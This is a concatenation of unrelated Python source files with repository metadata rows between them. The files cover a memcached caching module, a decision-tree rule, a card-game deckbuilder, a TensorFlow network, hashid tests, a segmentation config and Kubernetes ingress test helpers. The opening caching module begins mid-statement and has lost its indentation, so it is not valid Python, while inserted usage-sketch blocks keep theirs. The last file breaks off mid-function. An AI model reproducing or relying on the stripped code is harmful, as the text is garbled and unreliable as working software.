behaviors={"tcp_nodelay": True, "ketama": True}
)
user_cache = pylibmc.Client(
memcache_settings["user_cache"],
binary=True,
behaviors={"tcp_nodelay": True, "ketama": True}
)
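# get_plus_json caches an API payload together with a soft expiry timestamp
# ("api.expired_at") that is shorter than the memcached TTL; once the soft expiry
# passes, a "<key>_mutex" entry created with add() lets a single caller rebuild the
# value while concurrent callers keep serving the stale copy.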
def get_plus_json(key, func, expire_m=None, expire_s=None, is_update=False, set_retry=True, not_valid_check={}):
key_expire_name = "api.expired_at"
raw_content = None
if not is_update:
n = time.time()
content = page_cache.get(key)
try:
u = time.time() - n
if u > 1:
logging.error("get key %s use %s", key, u)
except Exception, e:
pass
if content:
if isinstance(content, dict) and content.has_key(key_expire_name):
if content.get(key_expire_name) > int(time.time()):
#cache not expired
logging.debug("get key from cache:%s" % key)
return [content, ]
else:
#cache expired, need to fetch a new value
#if fetching the new value raises an exception, fall back to the old one
logging.debug("expired %s" % key)
raw_content = content
def get_and_set():
try:
#get result from origin function
result = func()
if result:
#new version key result
#{
# "api.body" : xxxxx
# "api.expire" : 1363672663
#}
valid = True
if not_valid_check:
if isinstance(result, list):
for r in result:
for k, v in not_valid_check.iteritems():
if r.get(k) == v:
valid = False
break
if valid:
logging.debug("set new version data")
data = {key_expire_name: int(time.time() + expire_m)}
for r in result:
data.update(r)
logging.debug("get data add set key:%s" % key)
page_cache.set(key, data, expire_s)
return [data, ]
except Exception, e:
logging.error(e)
if raw_content:
logging.debug("exception use old key:%s" % key)
if set_retry:
#set 10 minute retry
data = raw_content
data.update({key_expire_name: int(time.time() + settings.cache_expire_15M)})
page_cache.set(key, data, expire_s)
return [raw_content, ]
else:
#must be evictions or an old key
logging.error(e)
raise e
#default pool0 one hour after be expired.
expire_m = expire_m or settings.cache_expire_1H
#expire_m = 3 for test
#2h not expire
expire_s = expire_s or expire_m + settings.cache_expire_2H
#key for mutex
key_mutex = '%s_mutex' % key
if page_cache.add(key_mutex, 1, settings.cache_expire_1M):
#only allow one
logging.debug("*mutex: %s" % key_mutex)
try:
raw_content = get_and_set()
finally:
logging.debug("delete mutex key:%s" % key_mutex)
#delate mutex key
page_cache.delete(key_mutex)
else:
#when the key has expired but another caller holds the mutex, return the old value
logging.debug("*mutex locked: %s" % key)
if not raw_content:
#retry via func(); normally we only get here when the entry was evicted
logging.debug("* evictions: %s" % key)
import timeit
n = timeit.default_timer()
raw_content = get_and_set()
spend = timeit.default_timer() - n
#todo logging.error spend url
logging.error("* evictions: %s %s" % (func.func_closure[0].cell_contents.request.path, spend))
return raw_content
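# --- illustrative usage sketch (not part of the original module) ---
# get_plus_json expects `func` to return a list whose first element is a dict payload;
# the wrapper stores it together with an "api.expired_at" stamp and uses the
# "<key>_mutex" add() trick so that only one process refreshes an expired key at a time.
# The key name and payload below are made up for illustration.
def _example_get_plus_json_usage():
    def fetch_payload():
        # in real code this would hit the database or an upstream API
        return [{"api.body": {"status": "ok"}}]
    key = "api#example#get_plus_json"
    return get_plus_json(key, fetch_payload, expire_m=settings.cache_expire_1H)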
def _encode_cache_key(k):
if isinstance(k, (bool, int, long, float, str)):
return str(k)
elif isinstance(k, unicode):
return k.encode('utf-8')
elif isinstance(k, dict):
import urllib
for x in k.keys():
k[x] = _encode_cache_key(k[x])
return urllib.urlencode(sorted(k.items()), True)
else:
return repr(k)
def function_cache(cache_keys="", prefix='api#phone', suffix='fun', expire_time=60 * 60, is_update_cache='', extkws={}):
u"""
cache_keys:缓存取那些参数当key,key之间用豆号分割,空就是用函数所有参数
prefix:前缀,suffix:后缀
expire_time:缓存时间,defaut time 30'm
is_update_cache="YES" or '' ,是否马上更新缓存,空到expire_time才更新缓存
extkws={},追加缓存参数,同名覆盖缓存参数
is_obd:"YES" or '' ,缓存运营管理
生成ckey的长度len不超过200
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
cache_keys_list = []
if cache_keys:
cache_keys_list = cache_keys.split(',')
arg_names, varargs, varkw, defaults = inspect.getargspec(func)
#defaults
_defargs = dict(zip(arg_names[-len(defaults):], defaults)) if defaults else {}
_args1 = dict(zip(arg_names, args))
_kwds = dict(_defargs, **_args1)
_kwds.update(kwargs)
_kwds.update(extkws)
otheragrs = []
if varargs:
tmp = _args1.values()
otheragrs = [v for v in args if v not in tmp]
if otheragrs:
for i in xrange(0, len(otheragrs)):
_k = "_arg{}".format(i)
_kwds[_k] = otheragrs[i]
if cache_keys_list:
for k, v in _kwds.items():
if k not in cache_keys_list:
_kwds.pop(k, None)
ckey = ""
if _kwds:
ckey = _encode_cache_key(_kwds)
ckey = hashlib.md5(ckey).hexdigest()
ckey = "{}#{}#{}".format(prefix, ckey, suffix)
if len(ckey) > 200:
ckey = ckey[:200]
try:
value = None if is_update_cache.upper() == 'YES' else func_cache.get(ckey)
if value is None:
value = func(*args, **kwargs)
if value:
func_cache.set(ckey, value, expire_time)
return value
except Exception, e:
return func(*args, **kwargs)
wrapper.original_function = func
wrapper.func_name = func.func_name
wrapper.__doc__ = func.__doc__
return wrapper
return decorator
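# --- illustrative usage sketch (not part of the original module) ---
# function_cache memoizes the decorated function's return value in memcached, keyed by an
# md5 of the selected arguments. The lookup function and its user_id argument below are
# hypothetical and only illustrate which argument ends up in the cache key.
@function_cache(cache_keys="user_id", prefix="api#phone", suffix="profile", expire_time=60 * 30)
def _example_cached_lookup(user_id, verbose=False):
    # only user_id is part of the cache key, so changing verbose does not fragment the cache
    return {"user_id": user_id}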
def page_static_cache(timeout=60 * 60 * 1, content_type="text/html", user_cache=True, host_cache=True,key_prefix=True):
"""
page cache
param:
timeout:the deadline of cache default is 1800
"""
def _func(func):
def wrap(request, *a, **kw):
key = request.get_full_path()
try:
key = key.encode("utf-8")
except Exception, e:
key = str(key)
if key_prefix:
key = "%s:%s" % (dateutils.zero_date().strftime('%Y-%m-%d'), key)
if user_cache:
key = "%s:%s" % (key, request.user.id)
if host_cache:
key = "%s:%s" % (key, request.get_host())
logging.debug("form get key:%s" % key)
key = hashlib.md5(key).hexdigest()
response = page_cache.get(key)
if not response or settings.DEBUG:
response = func(request, *a, **kw)
if response:
logging.debug("form set key:%s" % key)
page_cache.set(key, pickle.dumps(response), timeout)
else:
response = pickle.loads(response)
logging.debug("form get key:%s" % key)
return response
return wrap
return _func
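# --- illustrative usage sketch (not part of the original module) ---
# page_static_cache pickles the whole response object and keys it by the request path,
# optionally salted with the current date, the user id and the host. The view below is
# hypothetical; the local import keeps this sketch self-contained.
def _example_page_static_cache_view():
    from django.http import HttpResponse
    @page_static_cache(timeout=60 * 10, user_cache=False)
    def landing_page(request):
        return HttpResponse("cached landing page")
    return landing_page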
| 32.582707 | 120 | 0.527403 |
42af4742cc5e4bfe401ae862524e95f5d15be1d3 | 910 | py | Python | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/4_features/numtrees_45/rule_38.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/4_features/numtrees_45/rule_38.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/4_features/numtrees_45/rule_38.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | def findDecision(obj): #obj[0]: Coupon, obj[1]: Education, obj[2]: Occupation, obj[3]: Distance
# {"feature": "Coupon", "instances": 23, "metric_value": 0.9877, "depth": 1}
if obj[0]>0:
# {"feature": "Occupation", "instances": 20, "metric_value": 0.9341, "depth": 2}
if obj[2]<=12:
# {"feature": "Distance", "instances": 18, "metric_value": 0.8524, "depth": 3}
if obj[3]>1:
# {"feature": "Education", "instances": 11, "metric_value": 0.9457, "depth": 4}
if obj[1]<=0:
return 'True'
elif obj[1]>0:
return 'False'
else: return 'False'
elif obj[3]<=1:
# {"feature": "Education", "instances": 7, "metric_value": 0.5917, "depth": 4}
if obj[1]>0:
return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[2]>12:
return 'False'
else: return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
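# --- illustrative usage sketch (not part of the generated rule file) ---
# The feature vector layout follows the comment on findDecision:
# [Coupon, Education, Occupation, Distance], already label-encoded as integers.
# The concrete values below are made up; this vector follows the Coupon>0,
# Occupation<=12, Distance>1, Education<=0 branch and returns 'True'.
if __name__ == '__main__':
    print(findDecision([1, 0, 5, 2]))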
| 32.5 | 95 | 0.583516 |
6f16e1f596ec434153c8907b3eb7296db741a474 | 4,270 | py | Python | modules/deckbuilder.py | Nynergy/escher | cae055c1a11402f47ee577747985cf85b041ee0d | [
"MIT"
] | 1 | 2021-12-12T18:39:07.000Z | 2021-12-12T18:39:07.000Z | modules/deckbuilder.py | Nynergy/escher | cae055c1a11402f47ee577747985cf85b041ee0d | [
"MIT"
] | null | null | null | modules/deckbuilder.py | Nynergy/escher | cae055c1a11402f47ee577747985cf85b041ee0d | [
"MIT"
] | null | null | null | import random
from classes.Deck import RunnerDeck, CorpDeck
def generate_deck(args, card_pool):
if args['side'] == 'runner':
return generate_runner_deck(args, card_pool)
else:
return generate_corp_deck(args, card_pool)
def generate_runner_deck(args, card_pool):
identity = random_identity(args, card_pool)
deck = RunnerDeck(identity)
non_id_cards = [ c for c in card_pool if c['type_code'] != 'identity' ]
if args['guaranteed_econ']:
gamble = next(card for card in non_id_cards if card['title'] == 'Sure Gamble')
non_id_cards.remove(gamble)
for i in range(gamble['deck_limit']):
deck.addCard(gamble, False)
if args['guaranteed_types']:
types = ['Fracter', 'Decoder', 'Killer']
for breaker_type in types:
random.shuffle(non_id_cards)
icebreaker = next(card for card in non_id_cards if 'keywords' in card
and breaker_type in card['keywords'])
non_id_cards.remove(icebreaker)
deck.addCard(icebreaker, icebreaker['faction_code'] == deck.identity['faction_code'])
deck = fill_deck(deck, non_id_cards)
return deck
def random_identity(args, card_pool):
faction = args['faction']
if faction:
faction = [faction] if faction != 'minifaction' else ['adam', 'apex', 'sunny-lebeau']
identities = [ i for i in card_pool if i['type_code'] == 'identity'
and i['faction_code'] in faction ]
else:
identities = [ i for i in card_pool if i['type_code'] == 'identity' ]
random.shuffle(identities)
identity = identities.pop()
return identity
def fill_deck(deck, card_pool):
# Keep adding cards as long as minimum size hasn't been reached
while deck.current_deck_size < deck.min_deck_size:
random.shuffle(card_pool)
card = card_pool.pop()
number_to_add = random.randint(1, card['deck_limit'])
for i in range(number_to_add):
deck.addCard(card, card['faction_code'] == deck.identity['faction_code'])
return deck
def generate_corp_deck(args, card_pool):
identity = random_identity(args, card_pool)
deck = CorpDeck(identity)
# Add agendas to the deck before anything else
valid_factions = [identity['faction_code'], 'neutral-corp']
agendas = [ a for a in card_pool if a['type_code'] == 'agenda'
and a['faction_code'] in valid_factions ]
deck = fill_agendas(deck, agendas)
other_cards = [ c for c in card_pool if c['type_code'] not in ['identity', 'agenda'] ]
if args['guaranteed_econ']:
hedge = next(card for card in other_cards if card['title'] == 'Hedge Fund')
other_cards.remove(hedge)
for i in range(hedge['deck_limit']):
deck.addCard(hedge, False)
if args['guaranteed_types']:
types = ['Barrier', 'Code Gate', 'Sentry']
for ice_type in types:
random.shuffle(other_cards)
ice = next(card for card in other_cards if 'keywords' in card
and ice_type in card['keywords'])
other_cards.remove(ice)
deck.addCard(ice, ice['faction_code'] == deck.identity['faction_code'])
num_ice = 0
while num_ice < args['minimum_ice']:
random.shuffle(other_cards)
ice = next(card for card in other_cards if card['type_code'] == 'ice')
other_cards.remove(ice)
number_to_add = random.randint(1, ice['deck_limit'])
for i in range(number_to_add):
add_success = deck.addCard(ice, ice['faction_code'] == deck.identity['faction_code'])
if add_success:
num_ice += 1
deck = fill_deck(deck, other_cards)
return deck
def fill_agendas(deck, card_pool):
# Add agendas until we are in our point range
point_range = deck.agenda_point_range
while deck.current_agenda_points < point_range[0]:
random.shuffle(card_pool)
agenda = card_pool.pop()
number_to_add = random.randint(1, agenda['deck_limit'])
for i in range(number_to_add):
deck.addAgenda(agenda)
return deck
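# --- illustrative usage sketch (not part of the original module) ---
# generate_deck expects an args dict with the keys read above ('side', 'faction',
# 'guaranteed_econ', 'guaranteed_types', 'minimum_ice') and a card_pool list of
# NetrunnerDB-style card dicts. The concrete values below are assumptions.
def _example_generate_deck(card_pool):
    args = {
        'side': 'runner',
        'faction': 'shaper',          # or None for any faction, 'minifaction' for Adam/Apex/Sunny
        'guaranteed_econ': True,
        'guaranteed_types': True,
        'minimum_ice': 0,             # only consulted when building corp decks
    }
    return generate_deck(args, card_pool)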
| 36.495726 | 97 | 0.622248 |
ef982fba932d8fdf8b504b5687b06ca4ee6eafb6 | 1,673 | py | Python | cnn_wrapper/SCoordNet.py | somanyunknowns/KFNet | f0afda975211698f4689f295373df9a2d3660a47 | [
"MIT"
] | 202 | 2020-03-17T06:18:11.000Z | 2022-03-08T06:13:21.000Z | cnn_wrapper/SCoordNet.py | somanyunknowns/KFNet | f0afda975211698f4689f295373df9a2d3660a47 | [
"MIT"
] | 7 | 2020-04-10T00:46:42.000Z | 2021-06-30T00:07:06.000Z | cnn_wrapper/SCoordNet.py | somanyunknowns/KFNet | f0afda975211698f4689f295373df9a2d3660a47 | [
"MIT"
] | 27 | 2020-04-09T21:53:27.000Z | 2022-03-16T08:26:41.000Z | from cnn_wrapper.network import Network, layer
import tensorflow as tf
class SCoordNet(Network):
def __init__(self, inputs, is_training, focal_x, focal_y, u, v, dropout_rate=0.5, seed=None, reuse=False):
Network.__init__(self, inputs, is_training, dropout_rate, seed, reuse)
self.focal_x = focal_x
self.focal_y = focal_y
self.u = u
self.v = v
images = inputs['input']
shape = images.get_shape().as_list()
self.batch_size = shape[0]
self.height = shape[1]
self.width = shape[2]
def setup(self):
(self.feed('input')
.preprocess(name='preprocess')
.conv(3, 64, 1, name='conv1a')
.conv(3, 64, 1, name='conv1b')
.conv(3, 256, 2, name='conv2a')
.conv(3, 256, 1, name='conv2b')
.conv(3, 512, 2, name='conv3a')
.conv(3, 512, 1, name='conv3b')
.conv(3, 1024, 2, name='conv4a')
.conv(3, 1024, 1, name='conv4b')
.conv(3, 512, 1, name='conv5')
.conv(3, 256, 1, name='conv6')
.conv(1, 128, 1, name='conv7')
.conv(1, 4, 1, relu=False, name='prediction'))
@layer
def preprocess(self, input, name):
input = tf.multiply(tf.subtract(input, 128.0), 0.00625, name=name)
return input
def GetOutput(self):
prediction = self.get_output_by_name('prediction')
coord_map = tf.slice(prediction, [0, 0, 0, 0], [-1, -1, -1, 3], name='coord')
uncertainty_map = tf.slice(prediction, [0, 0, 0, 3], [-1, -1, -1, 1], name='uncertainty')
uncertainty_map = tf.exp(uncertainty_map)
return coord_map, uncertainty_map
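# --- illustrative usage sketch (not part of the original module) ---
# SCoordNet is built through the cnn_wrapper Network machinery above; the snippet only
# shows the constructor contract (a feed dict with an 'input' image tensor plus camera
# intrinsics). The placeholder shape and intrinsic values below are assumptions.
def _example_build_scoordnet():
    images = tf.placeholder(tf.float32, shape=[1, 480, 640, 3], name='input')
    net = SCoordNet({'input': images}, is_training=False,
                    focal_x=525.0, focal_y=525.0, u=320.0, v=240.0)
    coord_map, uncertainty_map = net.GetOutput()
    return coord_map, uncertainty_map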
| 31.566038 | 110 | 0.572026 |
e931329cd90cbd5a7988895ca68721eb47f95034 | 1,087 | py | Python | tests/features/hashid/test_hashid_middleware.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 1,816 | 2018-02-14T01:59:51.000Z | 2022-03-31T17:09:20.000Z | tests/features/hashid/test_hashid_middleware.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 340 | 2018-02-11T00:27:26.000Z | 2022-03-21T12:00:24.000Z | tests/features/hashid/test_hashid_middleware.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 144 | 2018-03-18T00:08:16.000Z | 2022-02-26T01:51:58.000Z | from src.masonite.essentials.middleware import HashIDMiddleware
from src.masonite.essentials.helpers.hashid import hashid
from tests import TestCase
class TestHashID(TestCase):
def test_hashid_hashes_integer(self):
assert hashid(10) == "l9avmeG"
def test_hashid_hashes_several_integers(self):
assert hashid(10, 20, 30) == "dB1I1uo"
def test_hashid_decodes_several_integers(self):
assert hashid("B1I1uo", decode=True) == (10, 20, 30)
def test_hashid_decodes_non_encoded_value_is_falsey(self):
assert not hashid("B8I6ub", decode=True)
def test_hashid_can_decode_dictionary(self):
assert (
hashid(
{
"id": "l9avmeG",
"name": "Joe",
},
decode=True,
)
== {"id": 10, "name": "Joe"}
)
def test_middleware(self):
request = self.make_request(query_string="id=l9avmeG&name=Joe")
HashIDMiddleware().before(request, None)
assert request.all() == {"id": 10, "name": "Joe"}
| 31.057143 | 71 | 0.605336 |
ae3922f0b20af4af29ab6d392c89fc9d81e05871 | 1,185 | py | Python | house/models.py | Redhead95/taskful_api | 2b28a7f6ecaeb1c77d3fd3bea9ae5922667b1044 | [
"MIT"
] | null | null | null | house/models.py | Redhead95/taskful_api | 2b28a7f6ecaeb1c77d3fd3bea9ae5922667b1044 | [
"MIT"
] | null | null | null | house/models.py | Redhead95/taskful_api | 2b28a7f6ecaeb1c77d3fd3bea9ae5922667b1044 | [
"MIT"
] | null | null | null | import os
import uuid
from django.db import models
from django.utils.deconstruct import deconstructible
@deconstructible
class GenerateHouseImagePath(object):
def __init__(self):
pass
def __call__(self, instance, filename):
ext = filename.split('.')[-1]
path = f'houses/{instance.id}/images/'
name = f'main.{ext}'
return os.path.join(path, name)
house_image_path = GenerateHouseImagePath()
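# --- illustrative note (not part of the original module) ---
# Django calls upload_to callables with (instance, filename); with the logic above an
# upload named "front.jpg" for a given house is stored as "houses/<house id>/images/main.jpg".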
class House(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=120)
image = models.FileField(upload_to=house_image_path, blank=True, null=True)
description = models.TextField()
points = models.IntegerField(default=0)
completed_tasks_count = models.IntegerField(default=0)
notcompleted_tasks_count = models.IntegerField(default=0)
manager = models.OneToOneField('user.profile', on_delete=models.SET_NULL, blank=True, null=True, related_name='managed_house')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return f'{self.id} | {self.name}'
| 32.916667 | 130 | 0.724895 |
648a84c66f7c657565d633d1eae7935b7bcec342 | 774 | py | Python | samples/openapi3/client/petstore/python-experimental/test/test_foo.py | therockstorm/openapi-generator | 01d0b5d4780ebe2d6025e2b443ec136c6ce16c45 | [
"Apache-2.0"
] | 11,868 | 2018-05-12T02:58:07.000Z | 2022-03-31T21:19:39.000Z | samples/openapi3/client/petstore/python-experimental/test/test_foo.py | therockstorm/openapi-generator | 01d0b5d4780ebe2d6025e2b443ec136c6ce16c45 | [
"Apache-2.0"
] | 9,672 | 2018-05-12T14:25:43.000Z | 2022-03-31T23:59:30.000Z | samples/openapi3/client/petstore/python-experimental/test/test_foo.py | therockstorm/openapi-generator | 01d0b5d4780ebe2d6025e2b443ec136c6ce16c45 | [
"Apache-2.0"
] | 4,776 | 2018-05-12T12:06:08.000Z | 2022-03-31T19:52:51.000Z | # coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import petstore_api
from petstore_api.model.foo import Foo
class TestFoo(unittest.TestCase):
"""Foo unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testFoo(self):
"""Test Foo"""
# FIXME: construct object with mandatory attributes with example values
# model = Foo() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 20.368421 | 174 | 0.657623 |
862ce7e1b0fa5fa9f0ead5a6a6d0ff08fb9e8d8b | 1,142 | py | Python | configs/ocrnet/ocrnet_hr18_512x512_160k_ade20k.py | Xlinford/mmsegmentation | 8b444de5e6db2af2538a73a93ac75204f5c3bb2f | [
"Apache-2.0"
] | null | null | null | configs/ocrnet/ocrnet_hr18_512x512_160k_ade20k.py | Xlinford/mmsegmentation | 8b444de5e6db2af2538a73a93ac75204f5c3bb2f | [
"Apache-2.0"
] | null | null | null | configs/ocrnet/ocrnet_hr18_512x512_160k_ade20k.py | Xlinford/mmsegmentation | 8b444de5e6db2af2538a73a93ac75204f5c3bb2f | [
"Apache-2.0"
] | null | null | null | _base_ = [
'../_base_/models/ocrnet_hr18.py', '../_base_/datasets/ade20k.py',
'../_base_/default_runtime.py', '../_base_/schedules/schedule_160k.py'
]
norm_cfg = dict(type='SyncBN', requires_grad=True)
model = dict(decode_head=[
dict(
type='FCNHead',
in_channels=[18, 36, 72, 144],
channels=sum([18, 36, 72, 144]),
in_index=(0, 1, 2, 3),
input_transform='resize_concat',
kernel_size=1,
num_convs=1,
concat_input=False,
dropout_ratio=-1,
num_classes=150,
norm_cfg=norm_cfg,
align_corners=False,
loss_decode=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)),
dict(
type='OCRHead',
in_channels=[18, 36, 72, 144],
in_index=(0, 1, 2, 3),
input_transform='resize_concat',
channels=512,
ocr_channels=256,
dropout_ratio=-1,
num_classes=150,
norm_cfg=norm_cfg,
align_corners=False,
loss_decode=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),
])
| 31.722222 | 75 | 0.570928 |
3c236624b72e9e4a853097191fcd5d1fa0bea629 | 946 | py | Python | pokebot/models/dqn.py | nacharya114/pokebot | b9028c86c5ee58178f348c75c39225f7b55507aa | [
"MIT"
] | 1 | 2020-05-20T04:52:24.000Z | 2020-05-20T04:52:24.000Z | pokebot/models/dqn.py | nacharya114/pokebot | b9028c86c5ee58178f348c75c39225f7b55507aa | [
"MIT"
] | null | null | null | pokebot/models/dqn.py | nacharya114/pokebot | b9028c86c5ee58178f348c75c39225f7b55507aa | [
"MIT"
] | null | null | null | #########################
# Author: Neil Acharya
#
# Generic Model Definition
#########################
from tensorflow.keras.layers import Dense, Flatten
from tensorflow.keras.models import Sequential
from ..bots.bot import BotPlayer
class DQNModel:
def __init__(self, player: BotPlayer):
self.player = player
self.model = None
self.setup_model_layers()
def setup_model_layers(self):
self.model = Sequential()
self.model.add(Dense(64, activation="elu", input_shape=(1, self.player.state_engine.shape,)))
        # Our embedding has shape (1, 10), which affects our hidden layer dimension and output dimension
        # Flattening resolves potential issues that would arise otherwise
self.model.add(Flatten())
self.model.add(Dense(64, activation="relu"))
self.model.add(Dense(len(self.player.action_space()), activation="linear"))
| 29.5625 | 106 | 0.634249 |
0615cce7232f7de1e29926298041520146298486 | 9,290 | py | Python | tests/suite/custom_assertions.py | Taymindis/kubernetes-ingress | 28d02e476455b2fd9ac9446cdff06749642ddb0c | [
"Apache-2.0"
] | 3,803 | 2016-03-10T14:33:39.000Z | 2022-03-31T20:01:58.000Z | tests/suite/custom_assertions.py | Taymindis/kubernetes-ingress | 28d02e476455b2fd9ac9446cdff06749642ddb0c | [
"Apache-2.0"
] | 1,159 | 2016-03-10T15:22:26.000Z | 2022-03-31T13:20:57.000Z | tests/suite/custom_assertions.py | Taymindis/kubernetes-ingress | 28d02e476455b2fd9ac9446cdff06749642ddb0c | [
"Apache-2.0"
] | 1,793 | 2016-03-12T15:17:09.000Z | 2022-03-31T02:00:55.000Z | """Describe the custom assertion methods"""
import time
import pytest
import requests
from suite.vs_vsr_resources_utils import get_vs_nginx_template_conf
from suite.resources_utils import get_events
def assert_no_new_events(old_list, new_list):
assert len(old_list) == len(new_list), "Expected: lists are of the same size"
for i in range(len(new_list) - 1, -1, -1):
if old_list[i].count != new_list[i].count:
pytest.fail(f"Expected: no new events. There is a new event found:\"{new_list[i].message}\". Exiting...")
def assert_event_count_increased(event_text, count, events_list) -> None:
"""
Search for the event in the list and verify its counter is more than the expected value.
:param event_text: event text
:param count: expected value
:param events_list: list of events
:return:
"""
for i in range(len(events_list) - 1, -1, -1):
if event_text in events_list[i].message:
assert events_list[i].count > count
return
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def assert_event_and_count(event_text, count, events_list) -> None:
"""
Search for the event in the list and compare its counter with an expected value.
:param event_text: event text
:param count: expected value
:param events_list: list of events
:return:
"""
for i in range(len(events_list) - 1, -1, -1):
if event_text in events_list[i].message:
assert events_list[i].count == count
return
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
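# --- illustrative usage sketch (not part of the original helpers) ---
# Typical flow in a test: fetch the namespace events first, then assert on a known
# message. `kube_apis` is assumed to be the usual pytest fixture, and the namespace and
# event text below are made up for illustration.
#
#   events = get_events(kube_apis.v1, "nginx-ingress")
#   assert_event_and_count("Configuration was added or updated", 1, events)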
def assert_event_with_full_equality_and_count(event_text, count, events_list) -> None:
"""
Search for the event in the list and compare its counter with an expected value.
:param event_text: event text
:param count: expected value
:param events_list: list of events
:return:
"""
for i in range(len(events_list) - 1, -1, -1):
# some events have trailing whitespace
message_stripped = events_list[i].message.rstrip()
if event_text == message_stripped:
assert events_list[i].count == count
return
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def assert_event_and_get_count(event_text, events_list) -> int:
"""
Search for the event in the list and return its counter.
:param event_text: event text
:param events_list: list of events
:return: event.count
"""
for i in range(len(events_list) - 1, -1, -1):
if event_text in events_list[i].message:
return events_list[i].count
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def get_event_count(event_text, events_list) -> int:
"""
Search for the event in the list and return its counter.
:param event_text: event text
:param events_list: list of events
:return: (int)
"""
for i in range(len(events_list) - 1, -1, -1):
if event_text in events_list[i].message:
return events_list[i].count
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def wait_for_event_count_increases(kube_apis, event_text, initial_count, events_namespace) -> None:
"""
Wait for the event counter to get bigger than the initial value.
:param kube_apis: KubeApis
:param event_text: event text
:param initial_count: expected value
:param events_namespace: namespace to fetch events
:return:
"""
events_list = get_events(kube_apis.v1, events_namespace)
count = get_event_count(event_text, events_list)
counter = 0
while count <= initial_count and counter < 4:
time.sleep(1)
counter = counter + 1
events_list = get_events(kube_apis.v1, events_namespace)
count = get_event_count(event_text, events_list)
assert count > initial_count, f"After several seconds the event counter has not increased \"{event_text}\""
def assert_response_codes(resp_1, resp_2, code_1=200, code_2=200) -> None:
"""
Assert responses status codes.
:param resp_1: Response
:param resp_2: Response
:param code_1: expected status code
:param code_2: expected status code
:return:
"""
assert resp_1.status_code == code_1
assert resp_2.status_code == code_2
def assert_event(event_text, events_list) -> None:
"""
Search for the event in the list.
:param event_text: event text
:param events_list: list of events
:return:
"""
for i in range(len(events_list) - 1, -1, -1):
if event_text in events_list[i].message:
return
pytest.fail(f"Failed to find the event \"{event_text}\" in the list. Exiting...")
def assert_event_starts_with_text_and_contains_errors(event_text, events_list, fields_list) -> None:
"""
Search for the event starting with the expected text in the list and check its message.
:param event_text: event text
:param events_list: list of events
:param fields_list: expected message contents
:return:
"""
for i in range(len(events_list) -1, -1, -1):
if str(events_list[i].message).startswith(event_text):
for field_error in fields_list:
assert field_error in events_list[i].message
return
pytest.fail(f"Failed to find the event starting with \"{event_text}\" in the list. Exiting...")
def assert_vs_conf_not_exists(kube_apis, ic_pod_name, ic_namespace, virtual_server_setup):
new_response = get_vs_nginx_template_conf(kube_apis.v1,
virtual_server_setup.namespace,
virtual_server_setup.vs_name,
ic_pod_name,
ic_namespace)
assert "No such file or directory" in new_response
def assert_vs_conf_exists(kube_apis, ic_pod_name, ic_namespace, virtual_server_setup):
new_response = get_vs_nginx_template_conf(kube_apis.v1,
virtual_server_setup.namespace,
virtual_server_setup.vs_name,
ic_pod_name,
ic_namespace)
assert "No such file or directory" not in new_response
def wait_and_assert_status_code(code, req_url, host, **kwargs) -> None:
"""
Wait for a specific response status code.
:param code: status_code
:param req_url: request url
    :param host: value of the "host" header to send with the request
    :param **kwargs: optional arguments that ``request`` takes
:return:
"""
counter = 0
resp = requests.get(req_url, headers={"host": host}, **kwargs)
while not resp.status_code == code and counter <= 30:
time.sleep(1)
counter = counter + 1
resp = requests.get(req_url, headers={"host": host}, **kwargs)
assert resp.status_code == code, f"After 30 seconds the status_code is still not {code}"
def assert_grpc_entries_exist(config) -> None:
"""
Assert that the gPRC config entries are present in the config file.
:param config: the nginx config
:return:
"""
assert "grpc_connect_timeout 60s;" in config
assert "grpc_read_timeout 60s;" in config
assert "grpc_send_timeout 60s;" in config
assert "grpc_set_header X-Real-IP $remote_addr;" in config
assert "grpc_set_header X-Forwarded-For $proxy_add_x_forwarded_for;" in config
assert "grpc_set_header X-Forwarded-Host $host;" in config
assert "grpc_set_header X-Forwarded-Port $server_port;" in config
assert "grpc_set_header X-Forwarded-Proto $scheme;" in config
assert 'grpc_set_header Host "$host";' in config
assert "grpc_next_upstream error timeout;" in config
assert "grpc_next_upstream_timeout 0s;" in config
assert "grpc_next_upstream_tries 0;" in config
def assert_proxy_entries_do_not_exist(config) -> None:
"""
Assert that the proxy config entries are not present in the config file.
:param config: the nginx config
:return:
"""
assert "proxy_connect_timeout 60s;" not in config
assert "proxy_read_timeout 60s;" not in config
assert "proxy_send_timeout 60s;" not in config
assert "proxy_set_header Upgrade $http_upgrade;" not in config
assert "proxy_http_version 1.1;" not in config
assert "proxy_next_upstream error timeout;" not in config
assert "proxy_next_upstream_timeout 0s;" not in config
assert "proxy_next_upstream_tries 0;" not in config
def assert_proxy_entries_exist(config) -> None:
"""
Assert that the proxy config entries are present in the config file.
